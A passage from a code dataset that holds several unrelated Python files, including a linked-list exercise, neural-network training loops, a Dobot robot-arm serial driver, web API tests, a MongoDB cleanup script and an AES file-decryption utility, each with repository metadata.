None:\r\n                print(\"Node doesn't exist\")\r\n                return\r\n            else:\r\n                prev.next = curNode.next\r\n                curNode = None\r\n    def printList(self):\r\n        curNode = self.head\r\n        while curNode != None: # changed from curNode.next to curNode and it works correctly\r\n            print(curNode.data)\r\n            curNode = curNode.next\r\n        print(\"\")\r\n    \r\nlink = linkedList() # instantiate linked list object\r\nlink.append(5) # pop\r\nlink.printList()\r\nlink.append(6) # pop\r\nlink.printList()\r\nlink.prepend(7) # pop 
back\r\nlink.printList()\r\nlink.insertAfter(link.head,8) # pop after head\r\nlink.printList()\r\nlink.deleteNode(5) # delete 5 node\r\nlink.printList() \r\nprint(\"Current length of list: \",link.length(), '\\n')\r\nlink.swap(7,6) # swap 7 and 6 nodes\r\nlink.printList()\r\nlink.reverse()\r\nlink.printList()\r\nlink.insertAfter(link.head,8)\r\nlink.printList()\r\nlink.deletePos(2) # delete at position 2\r\nlink.printList()\r\n","sub_path":"HW23_Linked_Lists.py","file_name":"HW23_Linked_Lists.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"277140841","text":"import torch\nimport torch.nn as nn\nimport torch.functional as F\nimport torch.optim as optim\n\nfrom tqdm import tqdm_notebook\nimport pandas as po\nimport numpy as np\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\ndef train(train_dataloader, window_size, model, loss_function, optimizer, num_epochs, input_dim, hidden_dim, dropout_prob):\n \n hidden_state = torch.randn(1, 1, hidden_dim)\n cell_state = torch.randn(1, 1, hidden_dim)\n \n losses = []\n \n model.train()\n for epoch in range(int(num_epochs)):\n print('Training epoch {}'.format(epoch+1))\n for step, batch in enumerate(train_dataloader):\n b_inputs = batch[0].tolist()\n b_target = batch[1].tolist()\n\n for i in range(window_size, len(b_inputs)):\n model.zero_grad()\n optimizer.zero_grad()\n\n input_ = torch.tensor(np.array(b_inputs[i-window_size:i]), dtype = torch.float).view(window_size, 1, input_dim).to(device)\n prediction, (hidden_state, cell_state) = model(input_, hidden_state, cell_state)\n prediction = prediction.view(1).to(device) \n\n target = torch.tensor([b_target[i]]).to(device)\n hidden_state.detach_()\n cell_state.detach_()\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), 0.25)\n loss = loss_function(prediction, target)\n loss.backward()\n optimizer.step()\n losses.append(loss.item())\n \n print('Loss after {} epochs = {}'.format(epoch + 1, loss))\n \n return model, hidden_state, cell_state, losses\n\n\n\n","sub_path":".ipynb_checkpoints/trainer-checkpoint.py","file_name":"trainer-checkpoint.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"80646245","text":"#!/usr/bin/python2\n\nimport os\nimport sys\nfrom mapbox import Static\nimport json\nimport requests\n\nMAPBOX_TOKEN = \"pk.XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\nJCDECAUX_KEY = \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n\n\ndef get_stations():\n # Doc: https://developer.jcdecaux.com/#/opendata/vls?page=getstarted\n url = \"https://developer.jcdecaux.com/rest/vls/stations/Toulouse.json\"\n data = json.loads(requests.get(url=url).text)\n \n return data\n\n\ndef save_map():\n # Doc: https://github.com/mapbox/mapbox-sdk-py/blob/master/docs/static.md#static-maps\n service = Static(access_token=MAPBOX_TOKEN)\n \n response = service.image('mapbox.satellite', lon=-61.7, lat=12.1, z=12)\n with open('/tmp/map.png', 'wb') as output:\n output.write(response.content)\n\n\ndef main():\n data = get_stations()\n print(data)\n \n save_map()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"41110226","text":"# -*- coding:utf-8 -*-\n\nimport common.mongodb.mongodb as mongodb\nimport 
common.util.date as date\nfrom common.util.progress import ProgressBar\nfrom common.util.utils import *\n\n\ndb = mongodb.Client.getDB()\n\n\ndef cleanUnits():\n    units = db.unit.find({'commonProperty.unitCommonForVisitor.cityInfo': {'$exists': False}})\n\n    bar = ProgressBar(total=units.count())\n\n    for unit in units:\n        # print unit\n        try:\n            communityId = unit['commonProperty']['unitCommonForVisitor']['communityId']\n        except BaseException:\n            continue\n\n        dbCommunity = db.community.find_one({\"id\": communityId})\n        if dbCommunity:\n            # print dbCommunity\n            cityInfo = dbCommunity.get('cityInfo')\n            if cityInfo:\n                db.unit.update({\"_id\": unit.get('_id')}, {\"$set\": {\"commonProperty.unitCommonForVisitor.cityInfo\": cityInfo}})\n            else:\n                bar.log(\"cannot find community cityInfo, communityId=%s\" % communityId)\n        else:\n            bar.log(\"cannot find community, communityId=%s\" % communityId)\n\n        bar.move()\n    bar.log()\n\n\ndef main(quiet = False):\n    runTips(lambda: cleanUnits(), 'Add city info for Shenzhen units', quiet)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"python/data_cleaner/transfer/v1_2/n6_add_city_for_unit_sz.py","file_name":"n6_add_city_for_unit_sz.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"20845674","text":"from aiohttp.test_utils import unittest_run_loop\n\nfrom tests.functional.sa.core.base import BaseTestCase\n\n\nclass ViewsTestCase(BaseTestCase):\n    @unittest_run_loop\n    async def test_list_view(self) -> None:\n        response = await self.client.get(\"/users\")\n        self.assertEqual(response.status, 200)\n        data = await response.json()\n        self.assertTrue(data)\n        user = data[0]\n        self.assertTrue(user[\"id\"])\n        self.assertIsNone(user.get(\"password\"))\n\n    @unittest_run_loop\n    async def test_retrieve_view(self) -> None:\n        response = await self.client.get(f\"/users/{self.user['id']}\")\n        self.assertEqual(response.status, 200)\n        data = await response.json()\n        self.assertTrue(data)\n        self.assertEqual(str(self.user[\"id\"]), data[\"id\"])\n\n    @unittest_run_loop\n    async def test_create_view(self):\n        response = await self.client.post(\"/users\", json=self.get_test_user_data())\n        assert response.status == 201, \"invalid response status code\"\n\n        data = await response.json()\n        self.assertTrue(data)\n        self.assertIn(\"id\", data)\n\n        user = await self.get_last_created_user()\n        self.assertEqual(str(user[\"id\"]), data[\"id\"])\n        self.assertEqual(user[\"name\"], data[\"name\"])\n        self.assertEqual(user[\"phone\"], data[\"phone\"])\n        self.assertEqual(user[\"email\"], data[\"email\"])\n\n    @unittest_run_loop\n    async def test_update_view(self):\n        user_data = {\n            \"id\": str(self.user.id),  # serialize uuid\n            \"created_at\": str(self.user.created_at),  # serialize datetime,\n            \"name\": \"Updated Name\",\n            \"email\": \"updated@mail.com\",\n            \"phone\": \"+7346352401\",\n        }\n        response = await self.client.put(f\"/users/{self.user.id}\", json=user_data)\n        assert response.status == 200, \"invalid response\"\n\n        response_data = await response.json()\n        updated_user = await self.get_user_by_id(self.user.id)\n        self.assertEqual(response_data[\"id\"], user_data[\"id\"])\n        self.assertEqual(response_data[\"name\"], user_data[\"name\"])\n        self.assertEqual(response_data[\"name\"], updated_user[\"name\"])\n        self.assertEqual(response_data[\"email\"], user_data[\"email\"])\n        self.assertEqual(response_data[\"email\"], updated_user[\"email\"])\n        self.assertEqual(response_data[\"phone\"], user_data[\"phone\"])\n        
self.assertEqual(response_data[\"phone\"], updated_user[\"phone\"])\n\n @unittest_run_loop\n async def test_create_with_null_value_that_must_not_be_null(self):\n test_user_data = self.get_test_user_data()\n test_user_data.pop(\"password\")\n response = await self.client.post(\"/users\", json=test_user_data)\n self.assertEqual(response.status, 400)\n data = await response.json()\n self.assertTrue(\"password\" in data[\"error\"] and \"null\" in data[\"error\"])\n\n @unittest_run_loop\n async def test_invalid_json(self):\n user_data = '{\"name\": \"My Name\", \"email\": \"test@email.com\", \"phone\": \"123\",}'\n response = await self.client.post(\"/users\", data=user_data, headers={\"Content-Type\": \"application/json\"})\n self.assertEqual(response.status, 400)\n data = await response.json()\n self.assertEqual(data[\"error\"], \"invalid json\")\n\n @unittest_run_loop\n async def test_partial_update_view(self):\n user_data = {\n \"email\": \"updated@mail.com\",\n }\n response = await self.client.patch(f\"/users/{self.user['id']}\", json=user_data)\n assert response.status == 200, \"invalid response\"\n\n response_data = await response.json()\n updated_user = await self.get_user_by_id(self.user[\"id\"])\n self.assertEqual(response_data[\"email\"], user_data[\"email\"])\n self.assertEqual(response_data[\"email\"], updated_user[\"email\"])\n self.assertNotEqual(updated_user[\"email\"], self.user[\"email\"])\n self.assertEqual(response_data[\"name\"], self.user[\"name\"])\n\n @unittest_run_loop\n async def test_update_non_existent_user(self):\n response = await self.client.put(\"/users/123\", json={})\n self.assertEqual(response.status, 404)\n\n @unittest_run_loop\n async def test_destroy_view(self):\n response = await self.client.delete(f\"/users/{self.user['id']}\")\n assert response.status == 204, \"invalid response\"\n\n user = await self.get_user_by_id(self.user[\"id\"])\n self.assertIsNone(user)\n\n @unittest_run_loop\n async def test_destroy_non_existent_user(self):\n response = await self.client.delete(\"/users/123\")\n self.assertEqual(response.status, 404)\n","sub_path":"tests/functional/sa/core/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"104386086","text":"from app.alunos.controllers import AlunosCreate\nfrom flask import Blueprint\nfrom app.alunos.controllers import AlunosCreate, AlunosDetails\n\naluno_api = Blueprint('aluno_api',__name__)\n\naluno_api.add_url_rule(\n '/aluno/create', view_func= AlunosCreate.as_view('aluno_create'), methods=['GET', 'POST']\n)\n\naluno_api.add_url_rule(\n '/aluno/details/', view_func= AlunosDetails.as_view('aluno_details'), methods=['GET', 'PUT', 'PATCH', 'DELETE']\n)","sub_path":"app/alunos/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"134117203","text":"import struct\nimport threading\nimport time\n\nimport serial\n\nfrom pydobot.message import Message\n\n\ndef retry(f):\n def dec(*a, **kw):\n while True:\n try:\n return f(*a, **kw)\n except:\n time.sleep(0.05)\n return dec\n\n\nMODE_PTP_JUMP_XYZ = 0x00\nMODE_PTP_MOVJ_XYZ = 0x01\nMODE_PTP_MOVL_XYZ = 0x02\nMODE_PTP_JUMP_ANGLE = 0x03\nMODE_PTP_MOVJ_ANGLE = 0x04\nMODE_PTP_MOVL_ANGLE = 0x05\nMODE_PTP_MOVJ_INC = 0x06\nMODE_PTP_MOVL_INC = 0x07\nMODE_PTP_MOVJ_XYZ_INC = 0x08\nMODE_PTP_JUMP_MOVL_XYZ = 0x09\n\nGET_POSE = 
10\nSET_HOME_CMD = 31\nSET_END_EFFECTOR_PARAMS = 60\nSET_END_EFFECTOR_SUCTION_CUP = 62\nSET_PTP_COORDINATE_PARAMS = 81\nSET_PTP_COMMON_PARAMS = 83\nSET_PTP_CMD = 84\nSET_CP_CMD = 91\nGET_QUEUED_CMD_CURRENT_INDEX = 246\n\n\nclass Dobot(threading.Thread):\n on = True\n x = 0.0\n y = 0.0\n z = 0.0\n r = 0.0\n j1 = 0.0\n j2 = 0.0\n j3 = 0.0\n j4 = 0.0\n\n # joint_angles = [4]\n\n def __init__(self, port, verbose=False):\n threading.Thread.__init__(self)\n self.verbose = verbose\n self.lock = threading.Lock()\n self.ser = serial.Serial(port,\n baudrate=115200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS)\n self.closed = threading.Event()\n is_open = self.ser.isOpen()\n if self.verbose:\n print('pydobot: %s open' % self.ser.name if is_open else 'failed to open serial port')\n self._set_ptp_coordinate_params(velocity=200.0, acceleration=200.0)\n self._set_ptp_common_params(velocity=200.0, acceleration=200.0)\n self._get_pose()\n self.start()\n\n def run(self):\n while self.on:\n try:\n self._get_pose()\n except AttributeError:\n pass # Don't die on attribute errors in this thread since they should be transient\n time.sleep(0.2)\n self.lock.acquire()\n self.ser.close()\n if self.verbose:\n print('pydobot: %s closed' % self.ser.name)\n self.lock.release()\n self.closed.set()\n\n def close(self):\n self.on = False\n self.closed.wait(1)\n\n def wait_for_queue_to_drain(self):\n while self._get_queued_cmd_current_index() < self.queue_pos:\n time.sleep(0.1)\n\n def _send_command(self, msg, sync=False):\n with self.lock:\n self._send_message(msg)\n response = self._read_message()\n # for some reason HOME returns nothing contrary to documentation, so it's always considered async\n if msg.queued and msg.id != SET_HOME_CMD:\n self.queue_pos = struct.unpack(\"L\", response.params[-8:])[0]\n if sync:\n self.wait_for_queue_to_drain()\n return response\n\n def _send_message(self, msg):\n time.sleep(0.1)\n if self.verbose:\n print('pydobot: >>', msg)\n self.ser.write(msg.bytes())\n\n def _read_message(self):\n time.sleep(0.1)\n b = self.ser.read_all()\n if len(b) > 0:\n msg = Message(b)\n if self.verbose:\n print('pydobot: <<', msg)\n return msg\n return\n\n def _get_pose(self):\n msg = Message()\n msg.id = GET_POSE\n response = self._send_command(msg)\n self.x = struct.unpack_from('f', response.params, 0)[0]\n self.y = struct.unpack_from('f', response.params, 4)[0]\n self.z = struct.unpack_from('f', response.params, 8)[0]\n self.r = struct.unpack_from('f', response.params, 12)[0]\n self.j1 = struct.unpack_from('f', response.params, 16)[0]\n self.j2 = struct.unpack_from('f', response.params, 20)[0]\n self.j3 = struct.unpack_from('f', response.params, 24)[0]\n self.j4 = struct.unpack_from('f', response.params, 28)[0]\n if self.verbose:\n print(\"pydobot: x:%03.1f y:%03.1f z:%03.1f r:%03.1f j1:%03.1f j2:%03.1f j3:%03.1f j4:%03.1f\" %\n (self.x, self.y, self.z, self.r, self.j1, self.j2, self.j3, self.j4))\n return response\n\n def _set_cp_cmd(self, x, y, z):\n msg = Message()\n msg.id = SET_CP_CMD\n msg.ctrl = 0x03\n msg.params = bytearray(bytes([0x01]))\n msg.params.extend(bytearray(struct.pack('f', x)))\n msg.params.extend(bytearray(struct.pack('f', y)))\n msg.params.extend(bytearray(struct.pack('f', z)))\n msg.params.append(0x00)\n return self._send_command(msg)\n\n def _set_ptp_coordinate_params(self, velocity, acceleration):\n msg = Message()\n msg.id = SET_PTP_COORDINATE_PARAMS\n msg.ctrl = 0x03\n msg.params = bytearray([])\n 
msg.params.extend(bytearray(struct.pack('f', velocity)))\n msg.params.extend(bytearray(struct.pack('f', velocity)))\n msg.params.extend(bytearray(struct.pack('f', acceleration)))\n msg.params.extend(bytearray(struct.pack('f', acceleration)))\n return self._send_command(msg)\n\n def _set_ptp_common_params(self, velocity, acceleration):\n msg = Message()\n msg.id = SET_PTP_COMMON_PARAMS\n msg.ctrl = 0x03\n msg.params = bytearray([])\n msg.params.extend(bytearray(struct.pack('f', velocity)))\n msg.params.extend(bytearray(struct.pack('f', acceleration)))\n return self._send_command(msg)\n\n def _set_ptp_cmd(self, x, y, z, r, mode, sync):\n msg = Message()\n msg.id = SET_PTP_CMD\n msg.ctrl = 0x03\n msg.params = bytearray([])\n msg.params.extend(bytearray([mode]))\n msg.params.extend(bytearray(struct.pack('f', x)))\n msg.params.extend(bytearray(struct.pack('f', y)))\n msg.params.extend(bytearray(struct.pack('f', z)))\n msg.params.extend(bytearray(struct.pack('f', r)))\n response = self._send_command(msg, sync=sync)\n return response\n\n def _set_end_effector_suction_cup(self, suck=False):\n msg = Message()\n msg.id = SET_END_EFFECTOR_SUCTION_CUP\n msg.ctrl = 0x03\n msg.params = bytearray([])\n msg.params.extend(bytearray([0x01]))\n if suck is True:\n msg.params.extend(bytearray([0x01]))\n else:\n msg.params.extend(bytearray([0x00]))\n return self._send_command(msg)\n\n def _set_home_cmd(self):\n msg = Message()\n msg.id = SET_HOME_CMD\n msg.ctrl = 0x03\n msg.params = bytearray([])\n self._send_command(msg, sync=False)\n\n def _set_end_effector_params(self, x, y, z):\n msg = Message()\n msg.id = SET_END_EFFECTOR_PARAMS\n msg.ctrl = 0x02\n msg.params = bytearray([])\n msg.params.extend(struct.pack('f', x))\n msg.params.extend(struct.pack('f', y))\n msg.params.extend(struct.pack('f', z))\n return self._send_command(msg)\n\n\n @retry\n def _get_queued_cmd_current_index(self):\n msg = Message()\n msg.id = GET_QUEUED_CMD_CURRENT_INDEX\n response = self._send_command(msg)\n # sometimes (when a command is running?) 
the returned struct has more than the index, but the index seems to\n # always be the last 8 bytes\n return struct.unpack(\"L\", response.params[-8:])[0]\n\n def home(self):\n self._set_home_cmd()\n\n def go(self, x=None, y=None, z=None, r=None, dx=None, dy=None, dz=None, dr=None, sync=True):\n assert not (x and dx) and not (y and dy) and not (z and dz) and not (r and dr), \"in any dimension, do not provide both absolute and relative values\"\n def update(old, abs, rel):\n if abs is not None:\n return abs\n elif rel is not None:\n return old + rel\n else:\n return old\n x = update(self.x, x, dx)\n y = update(self.y, y, dy)\n z = update(self.z, z, dz)\n r = update(self.r, r, dr)\n self._set_ptp_cmd(x, y, z, r, mode=MODE_PTP_MOVJ_XYZ, sync=sync)\n\n def set_end_effector_bias(self, x=0, y=0, z=0):\n self._set_end_effector_params(x, y, z)\n\n def suck(self, suck):\n self._set_end_effector_suction_cup(suck)\n\n def speed(self, velocity=100., acceleration=100.):\n self._set_ptp_common_params(velocity, acceleration)\n self._set_ptp_coordinate_params(velocity, acceleration)\n\n # def set_operating_bounds(self, xmin=None, xmax=None, ymin=None, ymax=None, zmin=None, zmax=None, rmin=None, rmax=None):\n # assert xmin < xmax, (xmin, xmax)\n # assert ymin < ymax, (ymin, ymax)\n # assert zmin < zmax, (zmin, zmax)\n # assert rmin < rmax, (rmin, rmax)\n\n ","sub_path":"pydobot/dobot.py","file_name":"dobot.py","file_ext":"py","file_size_in_byte":8671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"308475725","text":"from Crypto.Cipher import AES\r\nfrom Crypto import Random\r\n\r\nimport os, sys\r\n\r\ndef decrypt_it(bytefile, key, iv):\r\n\tcfb_decipher = AES.new(key, AES.MODE_CFB, iv)\r\n\treturn cfb_decipher.decrypt(bytefile)\r\n\r\ndef readBinFile(dir):\r\n\tfile = open(dir, \"rb\")\r\n\tdata = file.read()\r\n\tfile.close()\r\n\treturn data\r\n\r\ndef writeBinFile(dir, data):\r\n\tfile = open(dir, \"wb\")\r\n\tfile.write(data)\r\n\tfile.close()\r\n\r\ndef safe_os(cmd):\r\n\ttry:\r\n\t\tos.system(cmd)\r\n\texcept:\r\n\t\tpass\r\n\r\nprint (\"The program allows you to decrypt files\")\r\nprint (\"Please put the key file you have received from the sender in the current directory\")\r\ntemp = input (\"Press \\'Enter\\' key to continue...\\n\")\r\n\r\ntry:\r\n\tplain_key = readBinFile(\"KEYIV.key\")\r\nexcept:\r\n\traise Exception('KEYIV.key does not exist in the current directory')\r\n\r\n#Retrieving KEY and IV used for decryption\r\nprint (\"Retrieving KEYIV\")\r\n\r\ntry:\r\n\tkeyiv = open(\"KEYIV.key\", 'r')\r\n\tki = keyiv.readlines()\r\n\tkeyiv.close()\r\nexcept:\r\n\traise Exception('KEYIV.key does not exist in the current directory')\r\n\r\nprint (\"Retrieving completed\\n\")\r\n\r\nexec(\"key = \"+ ki[0][6:-2])\r\nexec(\"iv = \" + ki[1][5:-2])\r\n\r\nsafe_os('mkdir 1ENCRYPTED')\r\nsafe_os('mkdir 2DECRYPTED')\r\n\r\nprint (\"Please put the files you want to decrypt in \\'1ENCRYPTED\\'\")\r\ntemp = input (\"Press \\'Enter\\' key to continue...\")\r\n\r\n#Begin decryption\r\nprint (\"Retrieving files in 1ENCRYPTED\")\r\ntry:\r\n\tinFiles = os.listdir(\"1ENCRYPTED\")\r\nexcept:\r\n\traise Exception('Directory \\'1ENCRYPTED\\' does not exist in the current directory')\r\n\r\nprint (\"Beginning Decryption...\\n\")\r\n\r\nfor file in inFiles:\r\n\tprint (\"Decrypting\", file)\r\n\r\n\tfiledata = readBinFile(\"1ENCRYPTED/\"+file)\r\n\twriteBinFile(\"2DECRYPTED/\"+file[:-4], decrypt_it(filedata, key, iv))\r\n\r\n\tprint (\"Completed decrypting\", file, 
\"\\n\")\r\n\r\nprint (\"Decryption Completed\\n\")\r\n","sub_path":"DECRYPT_IT/FINAL_DECRYPT_IT_00.py","file_name":"FINAL_DECRYPT_IT_00.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"292322304","text":"import os\nimport numpy as np\nfrom keras.utils import generic_utils\nfrom keras.utils import np_utils\n\nfrom config import *\nfrom models_stat import *\n\ndef increase_lr(n,n_max,lr,inc):\n if n < n_max:\n K.set_value(lr, K.get_value(lr) +inc)\n return lr\n \ndef increase_lr2(n,n_max,lr,inc):\n if n < n_max + 4 and n > 4:\n K.set_value(lr, K.get_value(lr) +inc)\n return lr\n\ndef make_trainable(net, val):\n net.trainable = val\n for l in net.layers:\n l.trainable = val\n\"\"\"\ndef make_noise_sample(scale):\n noise_sample = scale * np.random.randn(BS, noise_dim)\n return noise_sample\n\"\"\"\n\ndef make_batch_for_dis(X_train, y_train, encoder, decoder,num_classes):\n idx = np.random.choice(np.arange(X_train.shape[0]), BS*n_feat_maps, replace=False)\n X_sample = X_train[idx]\n y_sample = y_train[idx]\n \n idx = np.random.choice(np.arange(X_train.shape[0]),BS*n_feat_maps, replace=False)\n train_img = X_train[idx] \n train_img = encoder.predict(train_img)\n\n if noise_dim == 0:\n #print(train_img.shape)\n decode_img = decoder.predict(train_img)\n else:\n noise_sample = make_noise_sample(noise_scale, BS)\n decode_img = decoder.predict([train_img, noise_sample])\n\n X_sample = np.concatenate((X_sample, decode_img),axis = 0)\n \n y = np.array(BS*n_feat_maps*[num_classes-1])\n y = np_utils.to_categorical(y) \n y_sample = np.concatenate((y_sample,y)) \n \n return X_sample, y_sample\n \ndef make_batch_for_dis_noise(X_train, y_train, encoder, decoder,num_classes): \n idx = np.random.choice(np.arange(X_train.shape[0]),BS, replace=False)\n train_img = X_train[idx] \n train_img = encoder.predict(train_img)\n\n noise_sample = make_noise_sample(noise_scale, BS)\n decode_img = decoder.predict([train_img, noise_sample])\n \n return decode_img, noise_sample \n\n \ndef make_batch_for_gan(X_train, y_train,stat_samples,encoder, num_classes):\n \n \n \n \n if pearson_loss:\n #chose random samples with the same temperature\n temp = np.random.randint(num_classes-1)\n idx = np.random.choice(np.arange(stat_samples[temp].shape[0]), 1, replace=False)\n idx = list(idx) * BS\n real_samples = stat_samples[temp][idx]\n \n \n #target values for temperature discriminator\n y_temp = np_utils.to_categorical([temp]*BS*n_feat_maps, num_classes = num_classes)\n y_temp = np.reshape(y_temp, (1,BS*n_feat_maps, num_classes)) \n \n else:\n #chose random samples with random temperature\n idx = np.random.choice(np.arange(X_train.shape[0]), BS, replace=False)\n real_samples = X_train[idx]\n \n #y_temp = y_train[idx] \n #y_temp = np.reshape(y_temp, (1,BS, num_classes)) \n \n y_temp = np.repeat(y_train[[idx[0]],:], n_feat_maps, axis = 0)\n for n in range(1,BS): \n y_temp = np.concatenate((y_temp,np.repeat(y_train[[idx[n]],:], n_feat_maps, axis = 0)), axis = 0)\n y_temp = np.reshape(y_temp, (1,BS*n_feat_maps,num_classes))\n\n \n enc_samples = encoder.predict(real_samples)\n \n X_sample = [np.reshape(enc_samples, (1,BS,3,20,20))]\n \n if noise_dim != 0:\n noise_sample = noise_scale * np.random.randn(1,BS, noise_dim)\n X_sample.append(noise_sample)\n\n if spec_h_loss:\n #batch of temperature values for the statistic learning\n temps = np.array([[temp_list[temp]]*(BS*n_feat_maps)])\n X_sample.append(temps)\n\n\n\n y_sample = 
[y_temp]\n\n\n\n #target values for reconstruction error\n if recon:\n y_recon = np.repeat(enc_samples[[0],:,:,:], n_feat_maps, axis = 0)\n for n in range(1,BS): \n y_recon = np.concatenate((y_recon,np.repeat(enc_samples[[n],:,:,:], n_feat_maps, axis = 0)), axis = 0)\n y_recon = np.reshape(y_recon, (1,BS*n_feat_maps,3,20,20))\n y_sample.append(y_recon)\n if pearson_loss: \n y_sample.append(np.array([[0.0]]))\n \n if noise_dis:\n noise_sample = noise_sample[0,:,:]\n y_noise = np.repeat(noise_sample[[0],:], n_feat_maps, axis = 0)\n for n in range(1,BS): \n y_noise = np.concatenate((y_noise,np.repeat(noise_sample[[n],:], n_feat_maps, axis = 0)), axis = 0)\n y_noise = np.reshape(y_noise, (1,BS*n_feat_maps,noise_dim)) \n y_sample.append(y_noise)\n\n\n return X_sample, y_sample\n #return X_sample, [y_temp,y_recon, np.reshape(stat_list[0][temp], (1,64)), np.reshape(stat_list[6][temp], (1,1)), np.reshape(stat_list[2][temp], (1,1)), np.reshape(stat_list[3][temp], (1,1)), np.reshape(stat_list[4][temp], (1,1))]\n\n\ndef pre_training(X_train, Y_train,encoder, decoder, dis_temp,num_classes,steps = 10):\n progbar = generic_utils.Progbar(steps*BS)\n for n in range(0,steps): \n X_sample, y_sample = make_batch_for_dis(X_train, Y_train ,encoder, decoder,num_classes) \n \n #unfreeze the weights of the discriminator\n make_trainable(dis_temp,True) \n #train the discriminator\n dt_loss = dis_temp.train_on_batch(X_sample, y_sample)\n \n progbar.add(BS, values=[(\"Loss_D\", dt_loss[0]),\n (\"Acc_D\", dt_loss[1])]) \n \n \t\t\ndef training(losses,X_train, Y_train,stat_samples, encoder, decoder, dis_temp,dis_noise, dis,gan,num_classes,nb_epoch=5000):\n #display the progess of the learning process \n progbar = generic_utils.Progbar(nb_epoch*BS)\n for e in range(0,nb_epoch):\n #for e in tqdm(range(nb_epoch)): \n\n X_sample, y_sample = make_batch_for_dis(X_train, Y_train,encoder, decoder,num_classes)\n #make_trainable(dis,True) \n make_trainable(dis_temp,True) \n dt_loss = dis_temp.train_on_batch(X_sample,y_sample)\n losses[\"dt\"].append(dt_loss)\n\n if noise_dis:\n X_sample, y_sample = make_batch_for_dis_noise(X_train, Y_train,encoder, decoder,num_classes)\n \n make_trainable(dis_noise,True) \n make_trainable(dis,True) \n dn_loss = dis_noise.train_on_batch(X_sample,y_sample)\n losses[\"dn\"].append(dn_loss) \n make_trainable(dis_noise,False) \n make_trainable(dis,False) \n\n \n #####################################################\n \n X_sample, y_target_list = make_batch_for_gan(X_train, Y_train,stat_samples,encoder, num_classes)\n \n make_trainable(dis_temp,False)\n g_loss = gan.train_on_batch(X_sample,y_target_list)\n #g_loss = [0]\n losses[\"g\"].append(g_loss)\n\n prog_list = [(\"DT\", dt_loss[0]), (\"Acc\", dt_loss[1])]\n \n if noise_dis:\n prog_list.append((\"DN\", dn_loss[0]))\n prog_list.append((\"A\", dn_loss[1]))\n\n\n prog_list.append((\"G\", g_loss[0])) \n for n in range(1,len(g_loss)):\n prog_list.append((str(n), g_loss[n])) \n \n progbar.add(BS, values= prog_list)\n\n return losses\n \n","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":7015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"234526933","text":"def error_handler():\n try:\n name = int('1232a') # ValueError\n lastname = ['yilmaz', 'keskin'][3] # IndexError\n other_dict = {\"name\":\"merve\", \"lastname\": \"demir\"}\n other_name = other_dict['other_name'] # KeyError\n age = 1/0 # ZeroDivisionError\n print('OK!')\n except (ValueError, IndexError, 
KeyError, ZeroDivisionError) as e:\n print(e)\n\nerror_handler()\n\n# Alperen Çubuk\n","sub_path":"answer6.py","file_name":"answer6.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"439001171","text":"###\n#AUTHOR: Nathaniel Watson\n###\n\ndef dnaRevComp(x):\n\t\"\"\"\n\tFunction : Returns the reverse complement of a string consisting of the letters A,C,G,T,N.\n\tArgs : x - str.\n\tReturns : str.\n Example: Given that x is ACCTG, returns CAGGT\n\t\"\"\"\n\tfrom string import maketrans\n\tx = x[::-1]\n\tstart=\"ACGTN\"\n\tend = \"TGCAN\"\n\ttranstab = maketrans(start,end)\n\treturn x.translate(transtab)\n\n","sub_path":"nucleic.py","file_name":"nucleic.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"16879485","text":"from loader import dp\nfrom aiogram.types import Message\nfrom services.service import get_formatted_categories, get_formatted_types\n\n\n@dp.message_handler(commands=['categories'])\nasync def categories_list(message: Message):\n answer_message = get_formatted_categories()\n await message.answer(answer_message)\n\n\n@dp.message_handler(commands=['types'])\nasync def types_list(message: Message):\n answer_message = get_formatted_types()\n await message.answer(answer_message)\n","sub_path":"handlers/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"631244560","text":"import os\nfrom abc import ABC, abstractmethod\nfrom copy import deepcopy\nfrom random import choice, choices, sample\nimport json\nimport glob\n\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\n\nimport macrocycles.config as config\nimport macrocycles.project_io as project_io\nimport macrocycles.utils as utils\n\n\nclass IPlanner(ABC):\n\n @abstractmethod\n def create_plan(self):\n pass\n\n\nclass PeptidePublicationPlanner(IPlanner):\n\n MAX_MW = config.MAX_MW - 258 # 258 is average of template MW\n\n def __init__(self, peptide_length, num_peptides):\n self.monomers = project_io.get_filtered_monomer_set()\n if not isinstance(self.monomers, list):\n self.monomers = list(self.monomers)\n self.c_cap_monomers = self.get_c_cap_monomers()\n self.saver = project_io.PeptidePlannerIO(peptide_length)\n self.peptide_length = peptide_length\n 